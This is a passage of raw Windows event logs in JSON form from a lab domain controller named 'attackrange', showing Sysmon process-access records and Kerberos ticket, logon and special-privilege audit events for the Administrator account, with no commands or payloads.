05:52:35.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4821,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-00109D990700}\r\nTargetProcessId: 3260\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-00109D990700}","TargetProcessId":"3260","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4822,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220558,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220559,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220560,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220561,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79AE1\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x79ae1","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{5CDAB13F-10D8-4E2C-7BAE-E23AF5B85977}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220562,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79AE1\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x79ae1","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4823,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4824,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4825,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.796\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-00109D990700}\r\nTargetProcessId: 3260\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 